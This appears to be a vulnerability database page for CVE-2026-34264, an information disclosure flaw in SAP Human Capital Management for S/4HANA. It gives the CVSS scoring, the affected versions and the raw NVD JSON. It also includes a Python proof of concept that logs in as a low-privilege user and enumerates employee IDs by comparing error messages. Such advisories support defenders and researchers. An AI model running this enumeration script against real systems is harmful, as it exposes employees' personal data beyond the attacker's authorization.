Security Vulnerability Report
CVE-2026-34264 CVSS 6.5 MEDIUM

CVE-2026-34264

Published: 2026-04-14 01:16:04
Last Modified: 2026-05-04 14:51:26

Description

During authorization checks in SAP Human Capital Management for SAP S/4HANA, the system returns specific messages. Due to this, an authenticated user with low privileges could guess and enumerate the content shown, beyond their authorized scope. This leads to disclosure of sensitive information causing a high impact on confidentiality, while integrity and availability are unaffected.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sap:human_capital_management:s4hcmrxx_100:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:human_capital_management:s4hcmrxx_101:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:human_capital_management:s4hcmrxx_102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:human_capital_management:sap_hrrxx_600:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:human_capital_management:sap_hrrxx_604:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:human_capital_management:sap_hrrxx_608:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:s\/4hana:-:*:*:*:*:*:*:* - NOT VULNERABLE
SAP Human Capital Management for SAP S/4HANA (see SAP Note 3680767 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# SAP S/4HANA Information Disclosure PoC
# Target: SAP Human Capital Management endpoint
# Description: Enumerates valid employee IDs by analyzing response messages.

target_url = "https://<sap_host>/sap/bc/webdynpro_abap/sap/hcm_manage_employee"
session = requests.Session()

# 1. Authenticate as a low-privilege user
login_payload = {
    'sap-user': 'low_priv_user',
    'sap-password': 'password',
    'sap-client': '001'
}
session.post("https://<sap_host>/sap/bc/webdynpro_abap/sap/login", data=login_payload)


# 2. Function to check if an ID exists based on error messages
def check_employee_id(emp_id):
    params = {'employee_id': emp_id}
    response = session.get(target_url, params=params)
    # Analysis: The system returns a specific message like "Authorization check failed"
    # if the ID exists but access is denied, vs "Record not found" if it doesn't exist.
    if "Authorization check failed" in response.text:
        return f"[+] ID {emp_id} exists (Access Denied - Valid ID)"
    elif "Record not found" in response.text or "does not exist" in response.text:
        return f"[-] ID {emp_id} does not exist"
    else:
        return f"[?] ID {emp_id} returned unknown response"


# 3. Enumeration loop
print("Starting enumeration...")
for i in range(1000, 1010):
    result = check_employee_id(i)
    print(result)
```

References

https://me.sap.com/notes/3680767 (Permissions Required)
https://url.sap/sapsecuritypatchday (Permissions Required)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-34264", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:04.200", "lastModified": "2026-05-04T14:51:26.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "During authorization checks in SAP Human Capital Management for SAP S/4HANA, the system returns specific messages. Due to this, an authenticated user with low privileges could guess and enumerate the content shown, beyond their authorized scope. This leads to disclosure of sensitive information causing a high impact on confidentiality, while integrity and availability are unaffected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_100:*:*:*:*:*:*:*", "matchCriteriaId": "5384DC3A-9770-407E-89F1-9FC134B5CF50"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_101:*:*:*:*:*:*:*", "matchCriteriaId": "FC80DB20-E930-410F-9972-CA4CF94CA9B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:s4hcmrxx_102:*:*:*:*:*:*:*", "matchCriteriaId": "993CDDD4-73D5-47F5-8017-A47B151F6CD0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_600:*:*:*:*:*:*:*", "matchCriteriaId": "ABD7D918-79F2-44BB-94A4-8950DAF2B4EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_604:*:*:*:*:*:*:*", "matchCriteriaId": "22796CDB-3AAA-4323-8A5B-69C61CC2EF46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:human_capital_management:sap_hrrxx_608:*:*:*:*:*:*:*", "matchCriteriaId": "3321A186-7B46-42C7-B4B6-FAB96608BBF5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:sap:s\\/4hana:-:*:*:*:*:*:*:*", "matchCriteriaId": "61225714-D573-435F-9423-7AE6A8ED59BC"}]}]}], "references": [{"url": "https://me.sap.com/notes/3680767", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
```